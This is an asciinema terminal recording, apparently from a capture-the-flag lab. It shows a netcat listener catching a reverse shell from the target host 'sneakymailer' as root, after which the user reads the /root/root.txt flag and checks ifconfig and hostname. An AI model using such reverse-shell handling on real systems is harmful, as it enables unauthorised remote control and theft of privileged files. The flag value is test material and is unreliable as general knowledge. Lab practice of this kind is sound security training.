{"version": 2, "width": 85, "height": 20, "timestamp": 1607104954, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.0283, "o", "\u001b]0;kali@kali: ~\u0007\u001b[1;34mkali@kali\u001b[00m:\u001b[1;32m~\u001b[00m$ "]
[0.293903, "o", "n"]
[0.362649, "o", "c"]
[0.451432, "o", " "]
[0.549636, "o", "."]
[0.97916, "o", "\b\u001b[K"]
[1.156848, "o", "-"]
[1.338641, "o", "l"]
[1.42661, "o", "v"]
[1.56396, "o", "n"]
[1.741444, "o", " "]
[2.37221, "o", "\b\u001b[K"]
[2.493294, "o", "p"]
[2.770976, "o", " "]
[2.932184, "o", "4"]
[2.96583, "o", "5"]
[3.109579, "o", "4"]
[3.14651, "o", "5"]
[3.387003, "o", "\r\n"]
[3.388318, "o", "listening on [any] 4545 ...\r\n"]
[4.869315, "o", "connect to [10.10.14.63] from (UNKNOWN) [10.10.10.197] 39304\r\n"]
[6.077308, "o", "w"]
[6.155895, "o", "h"]
[6.186698, "o", "o"]
[6.29183, "o", "a"]
[6.402914, "o", "m"]
[6.418925, "o", "i"]
[6.626816, "o", "\r\n"]
[6.838478, "o", "root\r\n"]
[7.252786, "o", "c"]
[7.47783, "o", "a"]
[7.691581, "o", "t"]
[7.763706, "o", " "]
[8.018775, "o", "/"]
[8.492557, "o", "r"]
[8.587258, "o", "o"]
[8.707297, "o", "o"]
[8.781347, "o", "t"]
[9.515902, "o", "/"]
[9.752153, "o", "r"]
[9.818702, "o", "o"]
[10.221082, "o", "o"]
[10.374338, "o", "t"]
[10.470203, "o", "."]
[10.750061, "o", "t"]
[10.826805, "o", "x"]
[10.924129, "o", "t"]
[11.210822, "o", "\r\n"]
[11.423919, "o", "9f65c31257d516a26558a4a760b08a3a"]
[11.424109, "o", "\r\n"]
[13.068928, "o", "i"]
[14.726024, "o", "f"]
[14.947897, "o", "c"]
[15.036842, "o", "o"]
[15.204336, "o", "n"]
[15.292052, "o", "f"]
[15.380452, "o", "i"]
[15.459004, "o", "g"]
[15.57083, "o", "\r\n"]
[15.783584, "o", "ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500\r\n        inet 10.10.10.197  netmask 255.255.255.0  broadcast 10.10.10.255\r\n        inet6 dead:beef::250:56ff:feb9:6bf4  prefixlen 64  scopeid 0x0<global>\r\n        inet6 fe80::250:56ff:feb9:6bf4  prefixlen 64  scopeid 0x20<link>\r\n        ether 00:50:56:b9:6b:f4  txqueuelen 1000  (Ethernet)\r\n        RX packets 578082  bytes 42096500 (40.1 MiB)\r\n        RX errors 0  dropped 714  overruns 0  frame 0\r\n        TX packets 250676  bytes 27655580 (26.3 MiB)\r\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\r\n\r\nlo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536\r\n        inet 127.0.0.1  netmask 255.0.0.0\r\n        inet6 ::1  prefixlen 128  scopeid 0x10<host>\r\n        loop  txqueuelen 1000  (Local Loopback)\r\n        RX packets 538488  bytes 58961406 (56.2 MiB)\r\n        RX errors 0  dropped 0  overruns 0  frame 0\r\n        TX packets 538488  bytes 58961406 (56.2 MiB)\r\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\r\n\r\n"]
[18.886123, "o", "h"]
[18.955043, "o", "o"]
[19.027275, "o", "s"]
[19.218878, "o", "t"]
[19.340101, "o", "n"]
[19.435214, "o", "a"]
[19.507439, "o", "m"]
[19.587032, "o", "e"]
[19.683329, "o", "\r\n"]
[19.897386, "o", "sneakymailer\r\n"]
[22.691001, "o", "^C\r\n"]
[22.69128, "o", "\u001b]0;kali@kali: ~\u0007\u001b[1;34mkali@kali\u001b[00m:\u001b[1;32m~\u001b[00m$ "]
[23.09262, "o", "exit\r\n"]
